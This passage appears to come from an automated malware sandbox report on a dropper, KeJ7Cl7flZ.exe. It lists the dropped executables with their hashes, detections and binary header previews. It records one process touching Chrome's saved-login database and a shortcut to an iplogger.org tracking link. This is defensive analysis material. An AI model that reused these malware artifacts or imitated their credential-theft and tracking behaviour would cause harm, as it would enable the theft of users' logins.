                                                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.5.6.8.<./.P.i.d.>.......
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERD05.tmp.xml
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4628
                                                                                                              Entropy (8bit):4.463401774562659
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:cvIwSD8zsVJgtWI9b7WSC8BnM+8fm8M4JsIhFFdI+q8OKaD4Evgqbd:uITfvkKSN8JBrIrB4Evgqbd
                                                                                                              MD5:719846863F13CDFE6A4B6C2AD6340F65
                                                                                                              SHA1:E1A00C1AF960014F33D14771CD7541BAAA7D8E8D
                                                                                                              SHA-256:75E86458817096DC98B0A6844DBFEF3A5BD125BE2F9BC4E26012DFB0F501513C
                                                                                                              SHA-512:0A6CEC446C4F3032C32DEB12C34BBD87C38DAC3BB423D6FD619F7FDC9B431940411BA930523B1830453D50544EE7E19758F07C4562530EE80E057B1C8D205713
                                                                                                              Malicious:false
                                                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="749296" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERD78B.tmp.dmp
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:Mini DuMP crash report, 14 streams, Sat Nov 28 23:05:20 2020, 0x1205a4 type
                                                                                                              Category:dropped
                                                                                                              Size (bytes):66612
                                                                                                              Entropy (8bit):1.9820330049632604
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:K1Oc59bDqecmIwARaNqcYmN5x3T4Fb8C6adY/xIKV/pmyx+mw/KOtuaG/SeOjr:8HyecsAkg0N5xcFbF1W/x7BmyCdjeo
                                                                                                              MD5:E24FB2EEBF67A573571B8420646E8774
                                                                                                              SHA1:2AE347D084DD202B1A480B0AD80C90EEA9C33C37
                                                                                                              SHA-256:D0D2A8D25A43130FC1DE5786080F531584F128E4D3125A4E7AB9BEC0D2EE916B
                                                                                                              SHA-512:9D7EBA878D08508AD2120E670E97463E7CFDDB0986ED0DE82DDA63C71C8E6E27B58BDC65679082C79A248241CB4D3B61673CFDED2E492F87C4E8739872C37531
                                                                                                              Malicious:false
                                                                                                              Preview: MDMP....... .........._...................U...........B...... .......GenuineIntelW...........T.............._.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD97.tmp.WERInternalMetadata.xml
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8286
                                                                                                              Entropy (8bit):3.7043446739903163
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:Rrl7r3GLNirZ6Nz6YCM69gmfXS5d6XCprl+89bO/sfaam:RrlsNil6J6YJ69gmfXS5MCOkfO
                                                                                                              MD5:A97C062B460F1282B1C3003BD4B5DAC7
                                                                                                              SHA1:11ED92911321C80907CAD4BAD55F14D41F4FDAB8
                                                                                                              SHA-256:452040C59F65042A6FFC4031A66170F9E053F2C999B2384D7320B17666DF5460
                                                                                                              SHA-512:C8F443B8AEB190FA5E5C6755CF5D0CA0DC1624512DD37CBFF3FC5F5D2A5E1EB065470CC34F13E6BE5591FFE315BE11F8C8CD9C18E8CF45AAB7AFC58094AFFF53
                                                                                                              Malicious:false
                                                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.5.6.8.<./.P.i.d.>.......
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERDFCB.tmp.xml
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4632
                                                                                                              Entropy (8bit):4.468168107337762
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:cvIwSD8zssJgtWI9b7WSC8BU8fm8M4JssZFt+q8cD/4Evgqbd:uITfqkKSNDJtxr/4Evgqbd
                                                                                                              MD5:69934B4EA55B849D6507300552AD293F
                                                                                                              SHA1:8254DD228E1685D7AACA7F54F3C5F2A284F4B2C8
                                                                                                              SHA-256:A84AB5A40CD2F2FE21573ED70246AC8BA492150AC8F0BFE24A6D9086600689CB
                                                                                                              SHA-512:19C3EB1B8AF3FE12B05174DC6068B1E2992AFA85D202764233317C6F8534E72D2B003E8BD6DC235313F0B8C3CD8576AA9DB3132C05CF361BF6C64CCB7287D79C
                                                                                                              Malicious:false
                                                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="749295" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                              C:\ProgramData\sib\{F9266136-0000-46F8-BC66-FDD9185E4296}\SibCa.dll
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4096
                                                                                                              Entropy (8bit):6.867501832742936
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:PAWqGuIO1w7JElw764ulqk4uWdCXufAx8Su2yk:oWaIO1S7ulqBhv+yk
                                                                                                              MD5:04F3C7753A4FCABCE7970BFA3B5C76FF
                                                                                                              SHA1:34FC37D42F86DAC1FD1171A806471CDFEAE9817B
                                                                                                              SHA-256:A735E33A420C2AD93279253BC57137947B5D07803FF438499AAAF6FD0692F4CD
                                                                                                              SHA-512:F774FC3F3EBF029DC6F122669060351CC58AE27C5224ABE2A6C8AB1308C4B796657D2F286760EB73A2AE7563EEEF335DAA70ED5E4B2560D34CA9873017658AFE
                                                                                                              Malicious:false
                                                                                                              Preview: ..MZ.........0......8-..@.8.0..p.........!...L.!This. program. cannot .be run i.n DOS mo.de....$...PE..L....d82........!..0............. ..B................... ...........@..*..-......#......`....O...+h..........(.Q..........8W.....O......HA...text..........u.[.......`.rsrc...M;.}.t.......@.0relo...U..)......B.......5...&......S..4o.......F.......s....(.....*..(....{.%...{.9....[...4.*..(".....}...."}A...}....D.}..6..B.(...+**D...* 6..si.......*...0.....,....(.....~......oRj..*&.....N"(@M.-...on.A..0......!H.(...o...."r..p(...(.E..r@.po.@.....o..........%.B.....(.@........o...&..% ....o.x......u...,..B...o!..B!....!...~...Tu.."..[......#E..8...o"..$Q ....c..o....*..*..`......IT..G.:. `....@;.`.0...`. 5.@.r?..pB1..s#.....A.R.%.r..p.%.DrW...%..*rFq .b*..s....%.o%@.%.oB&....o'...Do(..........o)......"o.>.o+..,oE..,a..+?.,-.@.t.7.a-%o......Yo/.../.o.].....-...r..../. #"...1..-......u.>....., ...o2......#...>....L....X..a"0.$..V..h".r..."3a..r.`.rZ@..p.(4 ....+!rh..c.B..r...po..D.U.*..*.
                                                                                                              C:\ProgramData\sib\{F9266136-0000-46F8-BC66-FDD9185E4296}\SibClr.dll
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe
                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):52520
                                                                                                              Entropy (8bit):6.011934677477037
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:9GyM4uxlvOe/c1xpfLIa97v3A5KobiPWh:9G1vt/g7fLb97Y5VmY
                                                                                                              MD5:928E680DEA22C19FEBE9FC8E05D96472
                                                                                                              SHA1:0A4A749DDFD220E2B646B878881575FF9352CF73
                                                                                                              SHA-256:8B6B56F670D59FF93A1C7E601468127FC21F02DDE567B5C21A5D53594CDAEF94
                                                                                                              SHA-512:5FBC72C3FA98DC2B5AD2ED556D2C6DC9279D4BE3EB90FFD7FA2ADA39CB976EBA7CB34033E5786D1CB6137C64C869027002BE2F2CAD408ACEFD5C22006A1FEF34
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d82............!..0.................. ........... ....................... ............@.....................................O.......h...............(...............8............................................ ............... ..H............text........ ...................... ..`.rsrc...h...........................@..@.reloc..............................@..B........................H........S..4o..........................................................F......s....(....*..(....*..{....*..{....*..{....*..{....*..(......}......}......}.......}....*6..{....(...+**..{......*6..si........*...0...........(.....~........oj...*&~.......*N(....-.~.....on...*.0..........(....o......r...p(....(....r...po.......o...........%.~.......(..........o....&........o .......u....,.~......o!...on... ...!...~..u....,.~......o!...on... ..."...[..u....,.~......o!...on... ...#
                                                                                                              C:\ProgramData\sib\{F9266136-0000-46F8-BC66-FDD9185E4296}\sib.dat
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1864
                                                                                                              Entropy (8bit):4.118434704813
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:DAC+SWx9cbv+eufJft0II/PD3Ccb2/SG+Df:DA3locxlX8ryxSG+
                                                                                                              MD5:04D0BDDEDBBC170CF791228E77032526
                                                                                                              SHA1:BF83D0C38B89D40CB72B63C4F1E74334F11B20D7
                                                                                                              SHA-256:B8571739BDAE473B25C929F9033087B3DCCDC84BBA6DC06586CEAD7C39A39123
                                                                                                              SHA-512:A0FFB05A1F8474AAE9FDB470ACF4DF918332C31B85C3CA7D7B8EF8D8599F058EDBFC374B9C49E7570D7A61F1E8A0A0B3B0CBF22ACA1416C35F03F7FB010D4C62
                                                                                                              Malicious:false
                                                                                                              Preview: ...&{.F.9.2.6.6.1.3.6.-.2.C.E.2.-.4.6.F.8.-.B.C.6.6.-.F.D.D.9.1.8.5.E.4.2.9.6.}.....p.1.........................a.d.m.i.n.....0...0...0.............I.:.\.n.e.w._.k.i.l.l.\.p.1.\.e.x.e.....p.1.(.3.)...e.x.e..E.{. "appVersion": "6.0.8",. "arpNoRemove": true,. "arpNoRepair": true,. "arpNoShow": true,. "lang": "en-US",. "productCode": "{F9266136-0000-46F8-BC66-FDD9185E4296}",. "uiScriptTest": false,. "uid": "{4401C0A1-7F46-4838-BBE8-B6F17E74AA74}",. "upgradeCode": "{9AC75AA0-89B9-4E79-86B4-89FBE7867A1E}".}...!%.S.y.s.t.e.m.R.o.o.t.%.\.S.y.s.t.e.m.3.2.\.S.H.E.L.L.3.2...d.l.l..........................................................&{.F.1.7.5.3.6.5.4.-.C.5.F.7.-.4.7.C.C.-.B.1.E.D.-.1.E.7.D.D.7.5.C.E.4.8.F.}.........s.e.t.u.p.........I.:.\.n.e.w._.k.i.l.l.\.p.1.\.s.e.t.u.p...e.x.e.................T.e.m.p.\.0.\.s.e.t.u.p...e.x.e.....-.s.........................................]{."ignoreFailure": false,."uiDisabled" : false,."uiHidden" : false,."uiUnSelected" : false
                                                                                                              C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                              Category:modified
                                                                                                              Size (bytes):40960
                                                                                                              Entropy (8bit):0.792852251086831
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                              MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                              SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                              SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                              SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                              Malicious:false
                                                                                                              Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Setup.exe.log
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):135
                                                                                                              Entropy (8bit):5.045303121991894
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:QHXMKa/xwwUCztJXILKNUhh+9Am12MFuAvOAsDeieVyn:Q3La/xwczfIWW+P12MUAvvrs
                                                                                                              MD5:BB527FDBC763485B0662FCCFD53AA00A
                                                                                                              SHA1:86438ECBAF308B24FA264C7B6ECECDABD1338DC0
                                                                                                              SHA-256:6158C0B5B794617AAD8DA6D671FEF9EDE9CAB2AA9A9FAD91D038739DFF5CEDBD
                                                                                                              SHA-512:2003E36806330552D7DD5E633F24A67F2F4226C12EE43A6F79BB709727DD52910CA5EAF336F9C1E5733C66BC3075CA24CACA19D086BE373B76AA08D3FA818106
                                                                                                              Malicious:false
                                                                                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.JScript, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                                              C:\Users\user\AppData\Local\Temp\85F91A36E275562F.exe
                                                                                                              Process:C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):411041792
                                                                                                              Entropy (8bit):0.15732403368611694
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:
                                                                                                              MD5:1B22D5DB9CD16098D4B8B38398029F4E
                                                                                                              SHA1:5E3CD7DE596C320A9F44F37703C787FEA211639C
                                                                                                              SHA-256:718E0B71FAE3F0273BF839E47814143B25D83ADDF2E15A90488E7883FE6077BC
                                                                                                              SHA-512:22F35D101C8ACD939258E2ACC4137AC0CBCB79422E9F16E336194A7DADB18B65FE19DA9A37D7D6E812E39E1C9C799C95069FDCAC36A0C9D3D68793F2DED31450
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview: MZ......................@..................................................3.!This program cannot be run in DOS mode....$.......-...i.i.i..9.k.`.:.w.`.,...`.+.P.N%.c.N%.H.i.d.`. ./.w.:.k.w.;.h.i.8.h.`.>.h.Richi.........................PE..L......K..........#..........@.......c....... ....@...........................................@.......@.....................<...T.......P........................................................................... ..@............................text............................... ....rdata..\.... ......................@..@.data............h..................@....rsrc...P............H..............@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe
                                                                                                              Process:C:\Users\user\Desktop\KeJ7Cl7flZ.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1306112
                                                                                                              Entropy (8bit):6.779030665912039
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:dbM2T9m39cm3+dAu/+jmxsh6QlSfaf0+MHueYujiRDAV0w0I4r:5bTcmm32JrYlSCfziK+0w
                                                                                                              MD5:6503C9C4F19A4B33B701CC5B97B349BC
                                                                                                              SHA1:FEDB760F67F6000BF311C76DFF55C35BEEDA8B81
                                                                                                              SHA-256:B79D5E0C3939BB3DD877DD327AF8D16A9406D8ECA0B888938A0AD39B56311C1A
                                                                                                              SHA-512:641629267461AE617BB639BE4A1C4498FE0AEA101B447A9CF1FC78140A6194992DE3E60A2EB936001226DC088248ED37254D39914F5D0DCED1351C9039823BF6
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Ft.....Q...Q...Q..OQ...Q..FQ...Q..GQ...Q..XQ...Q..CQ...Q...Q1..QDDWQ...QDDhQ...QDDiQ...Q.GmQ...Q.GSQ...Q...Q...Q.GVQ...QRich...Q........................PE..L......_.................v...........6............@..........................`............@..................................{...........?......................TG..................................p%..@............................................text....u.......v.................. ..`.rdata...............z..............@..@.data...` ..........................@....rsrc....?.......@...f..............@..@.reloc..TG.......H..................@..B................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\BTRSetp.exe
                                                                                                              Process:C:\Users\user\Desktop\KeJ7Cl7flZ.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):163328
                                                                                                              Entropy (8bit):6.766041496975016
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:F/lD4amo19XRWkv4bOI67IKI1LP6nVqQDSAH6h:rDQo19XRKqI+Ip1LwzWAH6
                                                                                                              MD5:6A6B5428C65FAEA27AC602D0C817476C
                                                                                                              SHA1:849ECCDB3097FAC7368587E4688153D80A5E3A8B
                                                                                                              SHA-256:C2B40AA7A76A98A5DB6C8C5BC02EEA5A25321188A149F6ECEE61EEA189BBC8BD
                                                                                                              SHA-512:04AEDC253EDD23A18D8D563ADFEC5B234A2825AFA92CF3686244875E3E4B5BE17EADB25C6F4C58F40827E6D664F49BAEB2B34AB9F72A2BC83AAB20B485608787
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_.................h...............`... ....@.. ....................... ............@..................................g..S....................................................................................................`..H..........."^qcJ\p..#... ...$..................@....text...he...`...f...(.............. ..`.rsrc...............................@..@.reloc...............z..............@..B.....................|.............. ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\John_Ship.url
                                                                                                              Process:C:\Users\user\Desktop\KeJ7Cl7flZ.exe
                                                                                                              File Type:MS Windows 95 Internet shortcut text (URL=<https://iplogger.org/1TT4a7>), ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):117
                                                                                                              Entropy (8bit):4.778776889587684
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:J25YdimVVG/VClAWPUyxAbABGQEZapfdCCAvKoXEL:J254vVG/4xPpuFJQxdCCASoe
                                                                                                              MD5:6670D1A3C9071DC7B0748F6818D7E1C3
                                                                                                              SHA1:AC02276BEC28157218DB0159BF83D85677ECF0DD
                                                                                                              SHA-256:6FA22C19F62054C0B6590112081AAF3217965C0216A029DE6390A2ECA7720F9B
                                                                                                              SHA-512:9433541797F6CB4AB93EA1B22A355030113C6131473C536DBFA52876D8928EDD0C160B05856849C9012A1EB8C67D2DFD8CE2E5DEDB2A1D6FF915103FC3E09472
                                                                                                              Malicious:false
                                                                                                              Preview: [{000214A0-0000-0000-C000-000000000046}]..Prop3=19,11..[InternetShortcut]..IDList=..URL=https://iplogger.org/1TT4a7..
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\SSSS.exe
                                                                                                              Process:C:\Users\user\Desktop\KeJ7Cl7flZ.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):308224
                                                                                                              Entropy (8bit):4.340693708730459
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:L3Vi8CzqGLI9F5NXgDJUnPms7U158fRWG0zn2tMbfcPRGCMjjjjjjjjo:OOGLI9lXUJ+Pms7d8G42tMbfcPRGCM
                                                                                                              MD5:7285B1F8E710E7D686F70306A76AD055
                                                                                                              SHA1:2D038C234C65B19B118C9820A917BA70E3623C18
                                                                                                              SHA-256:3DD96A30CF8E7A4E3E4E5FD64F4F71B78CE51F05C0B2DBB776D2CE4179ED7EA9
                                                                                                              SHA-512:A2B4C4F8AF7541409ECA18FCEEF718CEFAA6B8FA08222CA68BE30931AD7582F35D576CEF8C66EC3293EBE014FC8F1443F45A723437D84F70AAD3AA082D7A22BF
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L....el].....................^+......\............@...........................,.....&<......................................<...<.... +.......................,......................................................................................text............................... ..`.data.....)......4..................@....vuwuzed......+......0..............@....sudoze.......+......2..............@....rsrc........ +......4..............@..@.reloc..p.....,.....................@..B................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe
                                                                                                              Process:C:\Users\user\Desktop\KeJ7Cl7flZ.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4240136
                                                                                                              Entropy (8bit):7.970247718055294
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:98304:YjIeXG3LvUm3JyHGLjR+OCyn8LmqsQf4xi3OimS1gHNQd4yN:YjAAF2jR+68LmJ24xITCtQj
                                                                                                              MD5:62EAEA103DD9BEB69E884F2EDE1ACD63
                                                                                                              SHA1:324DB9E359DA3489217C5CB2F46B59AD383C8523
                                                                                                              SHA-256:E1A1205CC671D2008D09ED556DB705D3F3976B8098C4E2304C6E6C84041C22B8
                                                                                                              SHA-512:B501AF99056DA3D34EE27F63548C89F9C9157182C55838FAE26F510C88E2FA2105E083766F270F41B661E6306EB78D3B2D26BE3B7C2A9E0EF55B7FDF212BD94D
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...z...B...8............@.......................... ............@.................................@........@.......................`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...P...............................rsrc........@......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\askinstall21.exe
                                                                                                              Process:C:\Users\user\Desktop\KeJ7Cl7flZ.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):536576
                                                                                                              Entropy (8bit):6.856117131435329
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:RXvt5Xy3dte25VTD21EOj5Ia4c9co+3aag9dCj6pr1FWZGKSu9mJeoBL:R12T61E4IfXi95ndu9e
                                                                                                              MD5:3B7666DDCD8668A6E0F228BC15C2D528
                                                                                                              SHA1:1EC26D6AFC64C30291A12638F9FA1CACBC530834
                                                                                                              SHA-256:FF7C1BE25F9D0B351C2F1F11B9700D6C467519F6E374DF66A78DB855EAC39DD9
                                                                                                              SHA-512:21730DF8C6450F304926C0F81B2C1352563127FA353C4A05B32EA03C3950D65DAAA83B684C27F31334BF7C00B99CA49CAE508FCC2EF93AD1BF70B57310898995
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._..V.h...h...h..~....h..~....h..~....h..I....h..I...Yh..I...9h..~....h...h...h.......h....4..h...h\..h.......h..Rich.h..........PE..L...`.._.................>........................@.......................................@.....................................x....`..`....................`...<......p...............................@...............8............................text...t........................... ....vnnsfgf.=.......>.................. ..`.vnnsfgfz.... ...................... ..`.vnnsfgf.....0...................... ..`.vnnsfgf.....@.......*.............. ..`.vnnsfgf>....P.......,.............. ..`.vnnsfgf.....p.......>.............. ..`.rdata...............B..............@..@.data...P)...0......................@....rsrc...`....`......................@..@.reloc...<...`...>..................@..B........................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\config.ini
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
